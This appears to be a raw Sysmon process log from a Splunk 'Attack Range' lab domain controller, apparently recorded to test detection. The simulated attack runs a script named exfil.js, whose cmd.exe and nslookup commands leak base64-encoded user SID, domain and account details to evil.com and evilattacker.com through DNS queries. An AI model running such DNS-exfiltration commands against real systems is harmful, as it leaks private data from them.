2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000074018Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:22.272{A8622C2F-5C0E-6078-7F0F-00000000AE01}616C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMA== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C0E-6078-7C0F-00000000AE01}5116C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmie.tmp 2>&1 154100x800000000000000074006Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:22.245{A8622C2F-5C0E-6078-7E0F-00000000AE01}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073999Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:22.241{A8622C2F-5C0E-6078-7C0F-00000000AE01}5116C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmie.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000073984Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:20.656{A8622C2F-5C0C-6078-7B0F-00000000AE01}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073974Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:19.989{A8622C2F-5C0B-6078-7A0F-00000000AE01}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073964Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:19.323{A8622C2F-5C0B-6078-790F-00000000AE01}5628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073946Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:17.540{A8622C2F-5C09-6078-780F-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000073933Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:16.871{A8622C2F-5C08-6078-770F-00000000AE01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073925Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:16.203{A8622C2F-5C08-6078-760F-00000000AE01}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073896Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:09.817{A8622C2F-5C01-6078-750F-00000000AE01}5216C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C01-6078-730F-00000000AE01}920C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgckw.tmp 2>&1 154100x800000000000000073884Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:09.788{A8622C2F-5C01-6078-730F-00000000AE01}920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgckw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000073803Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:52.979{A8622C2F-5BF0-6078-720F-00000000AE01}7084C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evilattacker.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BF0-6078-700F-00000000AE01}5456C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgpy.tmp 2>&1 154100x800000000000000073792Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:52.947{A8622C2F-5BF0-6078-700F-00000000AE01}5456C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgpy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000073780Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:52.335{A8622C2F-5BF0-6078-6F0F-00000000AE01}1736C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BF0-6078-6D0F-00000000AE01}3376C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvzr.tmp 2>&1 154100x800000000000000073769Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:52.304{A8622C2F-5BF0-6078-6D0F-00000000AE01}3376C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvzr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000073752Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:52.161{A8622C2F-5BF0-6078-6C0F-00000000AE01}7036C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com 
C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BF0-6078-6A0F-00000000AE01}1408C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqjvk.tmp 2>&1 154100x800000000000000073741Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:52.131{A8622C2F-5BF0-6078-6A0F-00000000AE01}1408C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqjvk.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000073691Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:39.719{A8622C2F-5BE3-6078-690F-00000000AE01}5756C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BE3-6078-670F-00000000AE01}5196C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlddtrk.tmp 2>&1 154100x800000000000000073680Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:39.689{A8622C2F-5BE3-6078-670F-00000000AE01}5196C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlddtrk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000073618Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:22.219{A8622C2F-5BD2-6078-660F-00000000AE01}5456C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073610Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:22.072{A8622C2F-5BD2-6078-650F-00000000AE01}6248C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BD2-6078-630F-00000000AE01}6084C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkpqr.tmp 2>&1 154100x800000000000000073599Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:22.042{A8622C2F-5BD2-6078-630F-00000000AE01}6084C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkpqr.tmp 
2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000073586Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:20.645{A8622C2F-5BD0-6078-620F-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073576Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:19.979{A8622C2F-5BCF-6078-610F-00000000AE01}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073564Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:19.312{A8622C2F-5BCF-6078-600F-00000000AE01}5976C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073549Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:17.480{A8622C2F-5BCD-6078-5F0F-00000000AE01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073538Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:16.810{A8622C2F-5BCC-6078-5E0F-00000000AE01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073528Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:16.213{A8622C2F-5BCC-6078-5D0F-00000000AE01}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073494Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:09.644{A8622C2F-5BC5-6078-5C0F-00000000AE01}6660C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BC5-6078-5A0F-00000000AE01}3368C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpdtg.tmp 2>&1 154100x800000000000000073483Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:29:09.614{A8622C2F-5BC5-6078-5A0F-00000000AE01}3368C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® 
